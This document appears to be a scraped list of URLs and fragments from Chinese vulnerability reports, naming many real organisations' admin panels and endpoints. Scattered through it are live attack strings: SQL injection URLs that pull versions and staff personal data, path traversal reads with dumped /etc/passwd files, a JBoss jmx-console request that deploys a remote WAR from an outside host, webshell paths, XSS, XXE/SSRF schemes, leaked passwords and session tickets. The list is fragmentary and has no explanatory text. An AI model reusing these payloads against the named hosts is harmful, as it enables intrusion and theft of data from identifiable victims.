http://life.cqu.edu.cn//chinese/search/index.php?search=1 http://www.jinmi8.com/u/getpwd1.html http://**.**.**.**/login/Login.jsp?logintype=1 http://**.**.**.**/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=39 http://**.**.**.**//messager/users.data http://**.**.**.**/news.asp?nb=2 http://api.xianguo.com/i/status/get.json?key=36d979af3f6cecd87b89720d3284d420 http://www.swshb.com/admin/ http://14.152.92.89/admin/ http://**.**.**.**/list_xhjs.php?colid=23 http://**.**.**.**/new2014/temp/list_dljz.php?colid=17 http://yjsh.cqu.edu.cn/admin/ http://yjsh.cqu.edu.cn/admin/UI/Pages/Sys/OpterEdit.aspx?OpterId=6 http://yjsh.cqu.edu.cn/admin/Scripts//fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder http://**.**.**.**/index.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:492:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin revo:x:500:500::/home/revo:/bin/bash http://security.neusoft.com:7080/media/login.htm http://220.248.118.29/ http://220.248.118.29/Booking/ http://220.248.118.29/EhiApiDocument/namespaces.html http://220.248.118.29/PortalsAdmin/ http://220.248.118.29/ChargeAccount2/Login.aspx http://220.248.118.29/Html/EhiShare/CMS/login.html http://220.248.118.29/chexiangOA/ http://220.248.118.29/Html/EhiShare/CMS/car_information.html#### http://220.248.118.29/Html/EhiShare/CMS/template.html#### http://220.248.118.29/ChargeAccount2/Login.aspx http://220.248.118.29/ChargeAccount2/AccountRequestCard.aspx http://220.248.118.29/ChargeAccount2/AccountRequestInvoice.aspx http://220.248.118.29/ChargeAccount2/AccountRequestPay.aspx http://220.248.118.29/ChargeAccount2/AccountRequestVerify.aspx http://220.248.118.29/ChargeAccount2/Refund.aspx http://220.248.118.29/Html/EhiChauffeur/step1_user.html http://220.248.118.29/Html/EhiChauffeur/orderList.html http://220.248.118.29/Html/MyEhi/2_information.html#### http://220.248.118.29/Html/Other/contract/contract.html http://train.51taoshi.com/teacher/fore/yxprolist.action?keywords=&ptid=yichang&xdid=&xkid=&yearid= http://**.**.**.**/ system:type=ServerInfo http://**.**.**.** http://**.**.**.**/checkweb/ http://xlcp.xgc.nchu.edu.cn/psy/login.aspx http://**.**.**.**/search.aspx?key=1 http://jingang.yto56.com.cn/exptrack/main.action http://kfhz.daoyoudao.com/firstPage/city_getCitys.do?provincename=%25E6%25BE%25B3%25E9%2597%25A8%25E5%25B8%2582 http://**.**.**.**/ http://**.**.**.**/e/member/cp/ http://mail.998.com/ http://www.shiyanbar.com/questions/detail/tag/15 display:none display:red http://www.shiyanbar.com/questions/detail/tag/47 http://**.**.**.**/syzx/jskbcx.asp?id=258 http://partner.daoyoudao.com http://**.**.**.**/eKaoQin/admin/login.jsp http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:7001/gx-eams/NetService/ExternService/Apply/CompExam/Apply_CompExamSign_selectExam.jsp?isNewSign=true http://**.**.**.**/ http://havboss.vcomlive.com/login?null https://github.com/chengtalent/SpringDemo/blob/1fae7c734120357d7e0b8ee2d0b3b28275145206/build.gradle http://archiva.dianrong.com/repository/mirror http://archiva.dianrong.com/repository/internal http://archiva.dianrong.com/repository/snapshots http://archiva.dianrong.com/ https://mail.aimatech.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.aimatech.com%2fowa%2f http://op.mobage.cn http://www.sfs.nju.edu.cn/show.php?catid=36&id=11 http://philo.nju.edu.cn/show.php?catid=16&id=38 http://**.**.**.**/bug.php?action=view&id=137850 https://code.google.com/u/104096235605441642429/ http://wooyun.org/bugs/wooyun-2015-0159345 http://m.xiu.com/myxiu/retrieve_phone.html http://m.xiu.com/myxiu/retrieve_phone.html(新的) http://m.xiu.com/myxiu/retrieve_password.html(旧的) http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/website.rar https://www.dowedo.com.cn http://www.neusoftcase.com http://www.einfo.net.cn/ http://**.**.**.**/showpage.php?number=11257存在注入漏洞 http://www.kugou.com/www.kugou.com.tar.gz http://**.**.**.**/?r=about%2Findex&catalog_id=126 http://**.**.**.**/index.php?r=about%2Findex&catalog_id=126 http://consultant.eapchina.net http://www.haoshouwang.com/mycenter/oldinnewinfo?id=138 http://14.152.92.85/admin http://14.152.92.85/admin/adminLogin.action http://58.22.63.249 http://www.kaiyuanhotels.com BEF256C490D9A21B426BE52DFF3E1B60:FG=1 www.kaiyuanhotels.com http://ecases.medlive.cn/forum/topic_list.php?group_id=20000103&topic_type=5 http://**.**.**.**/rss.php?author=kacc_123 http://202.96.191.192 http://**.**.**.**:9091/index_new.asp?k=1&k_id=10&k_word=news&id=444中id参数存在sql注入 http://**.**.**.**:9091/upload_file.asp?keyno=0&pic=0&tablename=visainfo存在一个上传点 http://**.**.**.**:223/login.action?backURL=http%3A%2F%2F**.**.**.**%3A223%2Findex.action pwd:123456 http://**.**.**.**/upload_file.asp?keyno=0&pic=0&tablename=visainfo存在上传点 http://**.**.**.**/20160110.asp上传小马 http://**.**.**.**/2016wooyun.asp http://www.lecoudai.com/index.action encap:Ethernet addr:10.171.113.239 Bcast:10.171.119.255 Mask:255.255.248.0 MTU:1500 packets:5253551 packets:896113 txqueuelen:1000 http://**.**.**.**/index.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin casweb:x:500:500::/home/casweb:/sbin/nologin http://**.**.**.**/ http://jkys.cjn.cn/index.php?m=admin&c=index&a=login&pc_hash=G64K4a http://**.**.**.**/ http://register.ccidnet.com http://**.**.**.**:8888/wap/MasterPage.aspx http://222.73.63.161/index.php?rptid=152 http://www.boyaa.com www.boyaa.com http://**.**.**.**/mod/login.action http://**.**.**.** http://cg.suning.com/server-status http://hs.suning.com/server-status http://dj.suning.com/server-status http://wifi.suning.com/server-status http://oma.suning.com/server-status http://trade.suning.com/server-status http://mas.suning.com/server-status http://dls.suning.com/server-status http://fx.suning.com/server-status http://**.**.**.**/ http://221.192.235.83:3580/ http://221.192.235.83:8082 http://**.**.**.**/ http://android.kkfun.com http://e-learning.lenovo.com.cn/user/registration/index/ https://account.bilibili.com/login?sns=weibo http://login.weibo.cn/中生成的,有一定的时效性,后端会校验是否合法,因此我们需要动态生成登录的表单。我写了一个简单的flask接口,在服务端请求后提取出来生成表单,然后前端自动提交即可完成登录。 http://**.**.**.**/main/message/index_ins.php?ms_id=2164 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0122523 http://**.**.**.**/GetStuCheckinInfo http://**.**.**.**/db/index.php http://**.**.**.**/db/index.php?lang=zh-gb2312&co http://**.**.**.** http://**.**.**.**/ http://**.**.**.**:8080/ http://**.**.**.** http://**.**.**.**/index.php/shsj/Article/article?id=1488&furl=&fname= http://**.**.**.**/ http://**.**.**.**/site/about_us/title31_c/index.php?Company_SN=19560 http://**.**.**.**/)的文明创建动态管理系统 http://**.**.**.**:9080/imageFiles/ http://**.**.**.**/ http://**.**.**.**/study/modules.php?name=News&file=print&sid=84 http://api.g.sdo.com/game/getBannerList?netFlag=WIFI&v=2.0&os=1&type=2&ticket=RNK76Qw9Qh%2B6P8NLIJY3bLD6crjjLrXO1710%2FTAQ%2Bq4pcCtcTVI8YCF3MH7MDRerW92hm%2FNxfg5piqpYykwUxowVll%2FvBQSEE8dde8gyvDqnbwha8rObtfnuUXLtm71FAsrYbTbWiCKITRvlz5JnVcLkGJnZ%2F8oVtZ64yU02C2w%3D&sequence=25&version=a.6.0.0 url:http://**.**.**.**:5225/cjgsfxt/login.action http://**.**.**.** http://**.**.**.** POST:http://**.**.**.**./was40/search http://**.**.**.**/info_news_detail.asp?id=74 http://**.**.**.**:8880/ http://www.xm968890.com:8008/ http://www.xyz.cn/ http://**.**.**.**/group/index.htm https://mail.**.**.**.**/ http://**.**.**.**/en/news_details.php?id=25 http://**.**.**.**/sc/news_details.php?id=7 http://**.**.**.**/tc/news_details.php?id=13 http://dayi.51taoshi.com http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:81 http://**.**.**.**:81 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/chinese/02_about/download.php?f=../index.php http://**.**.**.**/chinese/02_about/download.php?f=../include/php_script/common.php http://**.**.**.**/ http://**.**.**.**/XSJCXX/FDY/XSJCXX_FDY_XS_LIST_XX.aspx?Zj=111122726 http://**.**.**.**/XSJCXX/FDY/XSJCXX_FDY_XS_LIST_XX.aspx?Zj=111122726 com:9000 http://222.73.63.161/ http://222.73.33.164:9000//jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war http://222.73.33.164:9000/ic/1.jsp http://222.73.33.164:9000/is/cmd.jsp http://**.**.**.** http://**.**.**.**/cn/download.php?f=/cn/index.php http://**.**.**.**/cn/download.php?f=/cn/info.php http://**.**.**.**/cn/download.php?f=/../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash man:x:13:62:Manual viewer:/var/cache/man:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false daemon:/var/lib/sshd:/bin/false usbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false statd:x:103:65534:NFS daemon:/var/lib/nfs:/sbin/nologin nullmail:x:104:105::/var/lock/svc/nullmailer:/bin/true mysql:x:60:106:MySQL admin:/var/lib/mysql:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false polkitd:x:499:498:User polkitd:/var/lib/polkit:/sbin/nologin http://**.**.**.**/tjrtvu.rar http://**.**.**.**/admin/Admin_Index.asp http://**.**.**.**/custom/jqgt/GroupNewsList.aspx?GroupId=130 https://113.29.38.71/用工具一测试就知道了 http://**.**.**.**:8087/module/listMess.action?page=1&rows=20&sort=createTime&order=desc,抓包: http://222.73.33.187:9000 http://222.73.33.188:9000 http://222.73.33.190:9000 system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war http://b2b.htd.cn/invoker/JMXInvokerServlet http://msc.fdsm.fudan.edu.cn http://msc.fdsm.fudan.edu.cn/phpmyadmin/index.php http://logistics.fudan.edu.cn/ http://ddim.fdsm.fudan.edu.cn/ http://newsletter.fdsm.fudan.edu.cn/ http://www.fc.fudan.edu.cn http://www.fc.fudan.edu.cn/administrator/ http://www.flcds.fudan.edu.cn http://www.flcds.fudan.edu.cn/admin/login.aspx http://nano-dds.fudan.edu.cn http://nano-dds.fudan.edu.cn/file.aspx http://**.**.**.**/govaffairs/ReplyHPage/Browse.aspx?id=TW201110311212407224 http://**.**.**.**/myDOP/SCENE/TIDBITS/tidbits.php?myfichier=ProfGuh&monid=1 http://**.**.**.**/TkuEEWebLog/Members/leader.php?page=1&tid=15 http://wooyun.org/bugs/wooyun-2015-0165926 http://support.daw.so/admin.php http://qa.daw.so http://**.**.**.**/flow.php?step=calculate_cart_goods_total&rec_id=1 http://**.**.**.** http://**.**.**.**/index.php?prog=download_file&file_link=./index.php&file_name=index.php http://**.**.**.**/index.php?prog=download_file&file_link=./include/config.inc.php&file_name=config.inc.php http://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1=111*&type=search http://www.xyz.cn/special/app.html http://222.73.243.217/ http://vsimu.au.tsinghua.edu.cn/vsimu/oa/vsimu_blockmore.php?id=2&item_id=1437647282 http://cd.5i5j.com/regLogin/register http://cd.5i5j.com/regLogin/change http://cd.5i5j.com/userCenter/userInfo(个人资料) http://lennyxss.sinaapp.com/3SUMMN?1452480920 http://youxue.huatu.com/manage/index.php http://youxue.huatu.com/data/safe/pass.php http://youxue.huatu.com/data/enums/V.php http://oa.sino-tcm.com/yyoa/ http://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1= http://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20USERNAME,TRUENAME,HANDPHONE,EMAIL2,BIRTHDAY,stuff_id,SYS_ID%20from%20person%20limit%2010 http://oa.sino-tcm.com/yyoa/welcome.jsp http://www.weixinyunduan.com/wx/wdyok-92245.html http://**.**.**.**/bugs/wooyun-2010-0131072 http://**.**.**.**/成功 http://**.**.**.**/ch/about/3717.html http://**.**.**.**/ch/about/3717*.html http://**.**.**.**/modules.php?page=%E8%A1%8C%E6%94%BF%E4%BA%BA%E5%93%A1&sidemenubar=2,2 http://wx.crc-gas.com/admin/Main/UserIndex http://wx.crc-gas.com/admin/Main/PayOrderIndex http://wx.crc-gas.com/admin/Main/ImgTxtList http://**.**.**.**:8090/sms/opac/search/showSearch.action http://**.**.**.**:8080/phpinfo.php http://**.**.**.**/main/YyxtQuestions.jsp?xtfl=05 http://**.**.**.**:88/SurveyDesign/share/webside/FindPassword.aspx http://wooyun.org/bugs/wooyun-2016-0168457 http://robotim.vmall.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/cn/index.jsp?m=newslist&cal=2 http://203.130.46.104:23458/index http://203.130.46.104:55070/logs/大量日志文件泄露 http://123.103.17.244:85/ http://125.210.191.39/home?width=1366&height=768 http://live.pchouse.com.cn/web.zip http://**.**.**.**/modules-Eng.php?page=IntroductionEng http://bbs.dji.com/forum.php?mod=viewthread&tid=39301&page=1&extra=#pid419511 http://wap.izuche.com/ http://wap.izuche.com/user/MyOrderPay.aspx?MainOrderID=129307 http://wap.izuche.com/user/MyOrderDetails.aspx?MainOrderID=129307 http://wap.izuche.com/user/MyOrderDetails.aspx?MainOrderID=129306 http://live800.wan.renren.com/live800/services/IVerification?wsdl http://ams.dhgate.com http://wooyun.org/bugs/wooyun-2016-0168457 http://chat.kefu.xoyo.com/live800//services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/Admin/ http://**.**.**.**/cms/special/specialurl.aspx?Id=9&type=formal www.izuche.com http://wap.izuche.com/user/MyInfo.aspx http://**.**.**.**/ http://gwh.tcl.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/map.aspx?keycode=*&wangdianid=2 www.kumayi.com http://180.153.27.4:8888/new/route/route_schedule.jsp?u&u=1&q_routeid=42771 https://222.128.5.208/ http://222.128.5.208:5678/manager/html http://222.128.5.208:10001/manager/html http://**.**.**.** http://yaoshi.sdo.com/fk/yaoshi/setting/set?KeyValueList=%7B%22pushloginswitch%22%3A%221%22%7D&netFlag=WIFI&sequence=282&ticket=RNK76Qw9Qh9ER4Ql/V/jOpq88wLfr/ZRTzqXKEfkZ9IxZe5JOrzJi52VsELTh05Z3L7a1YqtJK/GCuheFeWg1rkvuridVbe9J5P81PegQGb%2Bq5yO2tKFOHuZ9TqDAAtzGRpa2adsk9plr4iXospvfKpsPzZc99UDdJ%2BSC5G9bODN5UjiaLpdHQ%3D%3D&version=a.6.0.0 http://wooyun.org/bugs/wooyun-2016-0168457 http://live800.gffunds.com.cn/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://wen.daojia.com/ http://eqingfen.sz.tsinghua.edu.cn/remark.php?doc_id=2069 http://**.**.**.** http://**.**.**.** http://**.**.**.**/eng/download.php?file=/eng/download.php http://**.**.**.**/eng/download.php?file=/include/config.php http://**.**.**.**/ http://**.**.**.**/NewsPaper.aspx?NewsMagaID=4FBC611442E24383AAC7A89B1DAA550D http://**.**.**.**/Disnote.aspx?id=e2fcb675-cb62-49e8-8a13-89cba78e486a http://wooyun.org/bugs/wooyun-2016-0168457 http://online-service.deppon.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://zjc.ncu.edu.cn/jy/ https://cas.ncu.edu.cn:8443/cas/login http://oa.ncu.edu.cn/domcfg.nsf/loginforsso.fm?readform&ticket=001025&service=http%3A%2F%2Foa.ncu.edu.cn%2Fkeryec%2Findex.nsf%2FLocation1.ag%3Fopenagent%26ModKey%3DPersonalWork%26DBID%3DMail,枚举ticket这个参数可以看其他老师的邮件,好酸爽啊。 http://club.zerone.me/space.php?uid=14208&do=blog&id=69562 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://chat.kefu.xoyo.com/live800/services/IVerification?wsdl http://zxkf.efunds.com.cn/live800/services/IVerification?wsdl http://**.**.**.** http://wooyun.org/bugs/wooyun-2016-0168457 http://im.changyou.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://wooyun.org/bugs/wooyun-2016-0168457 http://chat800.mia.com/live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://**.**.**.**/tabc/ http://**.**.**.**/axis2/ http://idk.yingxiong.com/ http://wooyun.org/bugs/wooyun-2016-0168457 http://webchat.ruijie.com.cn//live800/services/IVerification?wsdl file:/// gopher://ip:port/%a http://ip:port/1.xml http://ip:port/1.xml http://www.chinanetwork.com.cn/w8/Knowledge/GetSideBarData?para=-1 http://222.73.243.217/ http://**.**.**.**/ibub/liuxue/?menuid=13&mainid=1&elsetype=6 http://oa.daojia.58.com/seeyon/main.do?method=main http://**.**.**.**/index.php?m=content&c=index&a=lists&catid=22&jg=0-8 http://59.cn/service/serLogin/w_service_chkLogin.asp?action=chklogin&auser=1 http://**.**.**.**:1723/yyoa/ http://www.gzxijiu.cn:8080/yyoa/ http://**.**.**.**/bugs/wooyun-2016-0168457 http://**.**.**.**//live800/services/IVerification?wsdl http://video.e23.cn/zhuanji/view.shtm?ZhuanjiID=120 http://live-i.meizu.com/live800/services/IVerification?wsdl file:///etc/hosts gopher://host:port/%a http://**.**.**.**/sionline/ http://**.**.**.**&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://care.amwaynet.com.cn/live800/services/IVerification?wsdl http://wooyun.org/bugs/wooyun-2014-074069 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://116.228.151.48:48080/ http://116.228.151.48:48080/f.jsp http://**.**.**.**/ http://info.315.com.cn/info_count.jsp?idn=-1 www.ximalaya.com/upload http://61.163.78.6:8080/yyoa/ http://**.**.**.**/pollutequery.asp?ID=WEB201512110851490022-00 http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://onlineservice.xiamenair.com/live800/services/IVerification?wsdl http://**.**.**.**/**.**.**.**.zip http://www.wenji99.com:80/.svn/entries http://www.wenji99.com/dlq9J15DshW5f http://univ.zte.com.cn/ztetrain/mngdefault.aspx?id=07 https://survey.alipay.com/feed.html http://bbs.yunsuo.com.cn/data/ http://**.**.**.**/index.action http://j.m.leju.com/notice/detail/?id=15842 http://**.**.**.**//index.php?m=Index&a=index&cityname=suzhou http://yjaq.51taoshi.com/fore/zy/zyList.action?aid=921&kws=&p=80&tid=0 http://zizhu.dlut.edu.cn/SurveyPage.aspx?pollid=15 http://eggserver.mumayi.com/v16/userstatus.php http://www.shiyanbar.com/experiment-course/detail/305 http://**.**.**.** http://**.**.**.**/force_download.php?file=../../force_download.php http://**.**.**.**/force_download.php?file=../../_common/site_config.php http://**.**.**.**/.svn/entries http://**.**.**.**/ http://**.**.**.**/ http://wq.jd.com/mcoss/mportal/show?tabid=6&tpl=7&PTAG=17012.4.2&ptype=4 http://202.108.145.199/helpdesk http://www.daoyoudao.com/job_BJ*_121.html http://www.ftimes.info/message/123.php?id= http://www.ftimes.info/message/messageshow.php?newsid= http://www.ftimes.info/message1/123.php?id= http://www.ftimes.info/message1/messageshow.php?newsid= http://www.ftimes.info/shenghuo_folder/shenghuo.php?bigtype= http://www.ftimes.info/shoucang_folder/shoucang_sanjinews.php?pageno= http://www.ftimes.info/shoucang_message/123.php?id= http://www.ftimes.info/shoucang_message/messageshow.php?newsid= http://www.ftimes.info/sousuo_search.php?neirong=&pageno= http://www.ftimes.info/wochi_zhangtu/showtu.php?id= http://www.ftimes.info/wochi_zhangtu/tiao1.php?id= http://www.ftimes.info/wochi_zhangtu/tiao2.php?id= http://www.ftimes.info/xinwen_erji.php?bigtype= http://**.**.**.**/site_item_content_2.php?site_map_item_id=197 http://**.**.**.**/site_item_content_2.php?site_map_item_id=766 http://**.**.**.**/site_item_content_2.php?site_map_item_id=394http://**.**.**.**/site_item_content_2.php?site_map_item_id=197 http://**.**.**.**/cms/webapp/preview.jsp?ColumnID=147&TID=20130729164934754639746 http://**.**.**.**/new2014/temp/list.php?tid=1&colid=2 http://**.**.**.**/bugs/wooyun-2015-0155643 http://**.**.**.**/web/user/login.asp http://**.**.**.**/sys/login/login.jsp http://**.**.**.**/BrowseServlet?szsat.trancode=401153&szsat.errpage=/WEB-INF/web.xml&szsat.normalpage=/WEB-INF/web.xml http://**.**.**.**/BrowseServlet?szsat.trancode=401153&szsat.errpage=/WEB-INF/applicationContext.xml&szsat.normalpage=/WEB-INF/web.xml http://**.**.**.**/LlfxServlet?lmbh=znjl_jbts&pagename=znjl&url=/WEB-INF/web.xml&errpage=/WEB-INF/web.xml http://**.**.**.**/LlfxServlet?lmbh=znjl_jbts&pagename=znjl&url=/WEB-INF/web.xml&errpage=/WEB-INF/html.tld http://mail.cgdc.com.cn http://**.**.**.**/userc/yuyueupdate.aspx?id=66770 http://**.**.**.**/dl.aspx http://crmail.crc.com.cn/ crmail.crc.com.cn/Aa123456 http://www.59.cn/domain/search.asp http://wooyun.org/bugs/wooyun-2016-0168384 http://122.96.58.36/merchant http://202.108.145.241:8080/ index.php/symbol/ordershow?id=1 http://act.jshdev.jushanghui.com/login/index.do?timeOut=ture http://**.**.**.**/bugs/wooyun-2015-0138409 http://ehr.cofco.com:8001/ http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011302 http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011301 http://ehr.cofco.com:8001/doc/personBasicInfo.do?personId=000003.18011303 http://ehr.cofco.com:8001/self/personInfoEdit.do?fk=000003.18011302 http://ehr.cofco.com:8001/self/personInfoEdit.do?fk=000003.18011302 http://**.**.**.** http://**.**.**.** http://**.**.**.** shell:http://**.**.**.**/upload/16/0112/m56946a4f37b101452567119.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/index.php/Public/checklogin http://i.emao.com/131676/friend/list_1_1.html http://**.**.**.**/waps/shop_order?id=12215 http://**.**.**.**/waps/shop_order?id=12214 http://**.**.**.**/waps/shop_order?id=12213 http://thrd.cofco.com http://**.**.**.**/login_.htm http://**.**.**.**/ http://**.**.**.** http://m.baidu.com存在XSS http://bbsm.g.baofeng.com/data/avatar/index.php http://**.**.**.**/ http://bugs.security.wooyun.org/58624f6864515a4c37746a7573594f4e37467a7262773d3d?2072b2e0cbbb7198e35ebddbfd38040d&ua=&ut=iPhone6s.0&uatype=iOS9.2 http://**.**.**.**:8800/cn/download.aspx?t=46 http://**.**.**.**/cn/download.aspx?t=46 http://biz.finance.sina.com.cn/stock/new_stock.php?code_list=031005,031006,580014,580021,580022,580024,580025,580026,580027,580017,580016&default=580027 http://**.**.**.**:80/NewWanbu/App/NewHome/index.php/Index/moreSpecial/typeid/9 http://bpm.tsingtao.com.cn:8080/thirdcost/ http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/appmanager/portlets/common/comkm/UserShortLinkSetup.jsp# http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/appmanager/logs/logQuery.jsp?startDate=2015-12-11&endDate=2016-01-11&endDate=%E6%9F%A5+%E8%AF%A2 http://tip.tsingtao.com.cn:7041/TsingtaoPortalWeb/portlets/pendingWork/morePendingWork.jsp?portletLabel=WS_YXZXJS_MAIN_DYSY&linkName=%3Cscript%3Ealert%281%29%3C/script%3E http://m.shop.zymk.cn http://**.**.**.**/kjxxw.php?id=113550 http://**.**.**.** http://**.**.**.**//services/ http://**.**.**.**//services/MobileService?wsdl为例 